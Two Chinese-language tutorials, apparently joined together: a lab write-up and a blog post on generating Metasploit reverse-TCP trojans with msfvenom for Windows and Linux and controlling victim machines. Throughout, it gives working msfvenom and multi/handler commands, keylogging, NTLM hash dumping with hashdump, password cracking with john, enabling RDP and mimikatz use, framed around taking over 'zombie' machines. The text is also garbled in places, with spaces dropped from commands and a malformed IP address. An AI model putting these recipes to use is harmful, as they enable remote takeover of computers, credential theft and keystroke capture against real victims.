使用Msfvenom生成木马并控制靶机的实验
*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。
实施用户密码破解一、环境配置(两台主机均采用NAT桥接模式)1、Kali主机的IP配置:(211.100.71.10/24)
2、winxp主机的IP配置:
(211.100.71.14/24)
二、远程控制计算机1、利用msfvenom工具生成一个木马控制端—shell.exe,并把该木马程序保存到root用户下(lhost要改成kali的IP,lport要改为自己手机尾数后四位,shell.exe改为姓名拼音小写首字母.exe)
msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.1.22 lport=1211-fexe>/root/shell.exe
2、将shell.exe文件拷贝到WINXP的桌面上3、启用MSF攻击平台4、加载模块和选择Payload5、设置Payload参数6、双击执行WINXP主机上的shell.exe文件7、在kali上实施渗透攻击8、在kali上实施键盘记录(1)输入如下命令启用键盘记录功能
(2)在windowsxp2的CMD.exe环境下输入命令
(3)在kali上打开键盘记录文件,可以看到文件中记录下来在windowsxp2中输入的内容。
9、用john(密码破解工具)破解windowsxp2在任务1创建的用户(即自己姓名的拼音小写首字母)密码,实验中用户名为:zs,密码为:police(选一个密码词典password.lst中的密码,作为登录密码)
(1)将用于破解的密码词典password.lst文件拷贝到root用户目录下
(2)在kali上用命令hashdump获取windowsxp2的用户名及加密后的密码(NTLMhash值)
(3)将zs用户的密码NTLMhash值保存在xxx.hash(xxx为姓名的拼音小写首字母)文件中,并查看
(4)启用john的图形化界面
(5)打开zs.hash文件进行破解
(6)选择要破解的密码加密算法和密码词典(password.lst)
(7)开始破解密码
(8)密码破解成功
最后希望大家遵纪守法!一起加油哈哈
msfvenom生成远控木马
声明:本篇内容,禁止用作非法目的,谢绝一切形式的转载。
当你在无意间点击一个链接后,当你在不明情况安装一个程序时,当你忍不住点击一个美女图片的时候,你的设备可能就此沦陷了,成为了黑客眼中的"肉鸡"。
kaliLinuxKaliLinux是基于Debian的Linux发行版,设计用于数字取证操作系统。由OffensiveSecurityLtd维护和资助。最先由OffensiveSecurity的MatiAharoni和DevonKearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版。
MetersploitMetasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
MeterpreterMeterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击在和使用,攻击在和在出发漏洞后能够返回给我们一个控制通道.
Linux攻击生成木马网络上有好多生成木马的方式,但是大多数都是相互copy,甚至有的还可能包含病毒,谨慎使用。网络上下载的所有软件都要慎用,除非是在官网上下载的。生成一个使用于Linux64位系统的木马,生成木马的命令如下:
msfvenom-ax64--platformlinux-plinux/x64/meterpreter/reverse_tcpLHOST=192.168.42.49LPORT=5555-i3-felf-otestLHOST代表Listeninghost。LPORT代表Listeningport。后续介绍网络的时候会详细讲解。
翻译一下这个命令:平台Linuxx64架构,使用payload是linux/x64/meterpreter/reverse_tcp,目标文件的格式是elf。可执行目标文件的名称是test。通过上面的命令,我们就就可以生成一个elf格式的test程序,当在远端(也就是"肉鸡")执行这个程序的时候,如果本地开启了监听,肉鸡和本机之间就建立了一条通信的channel,通过这个木马就能实现控制远端的肉鸡了,邪恶的微笑。
开启监听开启msfmsfconsole加载模块msf5>useexploit/multi/handler设置payloadmsf5exploit(multi/handler)>setpayloadlinux/x64/meterpreter/reverse_tcp设置监听ipmsf5exploit(multi/handler)>setlhost192.168..42.49设置监听portmsf5exploit(multi/handler)>setLPORT5555执行msf5exploit(multi/handler)>exploit攻击效果当执行玩exploit之后,我们可以获得一个Meterpreter。通过这个meterpreter,可以查看肉鸡中的文件,进程等。可以开启一个shell,这样基本等同于完全操控目标计算机了。通过查看whoami可知正是当前登陆用户的帐号。如何提升权限,后续会介绍。
Windows攻击生成木马msfvenom-ax64--platformwindows-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.42.49LPORT=4444-i3-fexe-opayload_test.exe具体含义可参考上文。
开启监听开启msfmsfconsole加载模块msf5>useexploit/multi/handler设置payloadmsf5exploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcp设置监听ipmsf5exploit(multi/handler)>setlhost192.168..42.49设置监听portmsf5exploit(multi/handler)>setLPORT4444执行msf5exploit(multi/handler)>exploit攻击效果当执行玩exploit之后,我们可以获得一个Meterpreter。通过这个meterpreter,可以查看肉鸡中的文件,进程等。同Linux。查看那getuid是Administrator,管理员权限。在Windows下,这还不是最高的权限,最高的权限是system,至于如何提权,后续会讲解。
开启一个shell,发现有乱码,这是由于Linux和Windows采用的编码方式不一致导致的。可以通过chcp65001解决这个问题。
桌面截图开启远程桌面通过以下命令开启rdp服务
runpost/windows/manager/enable_rdp如图:
添加用户
帐号密码破解使用minikatz进行密码破解
远程桌面通过rdestop目标ip-u账户,可以实现远程桌面的控制。
写在最后对于不明来历的链接、软件不要乱点。尽量安装一个杀毒软件。密码尽量复杂。
公众号更多内容,欢迎关注我的公众号:无情剑客